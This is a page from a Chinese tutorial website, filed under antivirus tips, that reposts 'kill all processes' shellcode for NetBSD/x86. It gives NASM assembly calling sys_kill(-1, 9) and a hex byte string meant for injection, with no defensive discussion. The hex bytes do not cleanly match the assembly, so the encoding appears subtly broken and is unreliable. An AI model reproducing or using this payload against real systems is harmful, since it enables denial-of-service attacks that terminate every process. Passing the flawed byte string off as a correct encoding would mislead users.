当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
机器中木马病毒后怎么解决呢?
AUTO木马群的毒霸解决方案
自动播放功能引起的病毒的预防
2008年年末全球病毒和木马的种类将超过100万种
建立局域网防病毒控制系统针对性防范病毒
四个检测硬盘与内存的绝招
让卡巴斯基仅监控选中的端口
确定计算机是否感染病毒和恢复方法以及防止感染
金山毒霸2008解决输入法无效病毒
卡巴斯基设置技巧
Windows系统安全模式的应用技巧
开机后提示winnet.dll丢失是怎么回事?
Javqhc病毒的现象和杀毒方法
常见的病毒前缀的解释(针对Windows)
网页中的隐形代码也对我们的电脑构成威胁
查杀无法删除的病毒的有效方法
如何识别和防御网页木马的攻击
卡巴斯基开启最强防御模式详解
防毒技巧之木马程序的“查堵杀”
MSHTML.DLL漏洞访问HTML导致IE崩溃

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 44 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */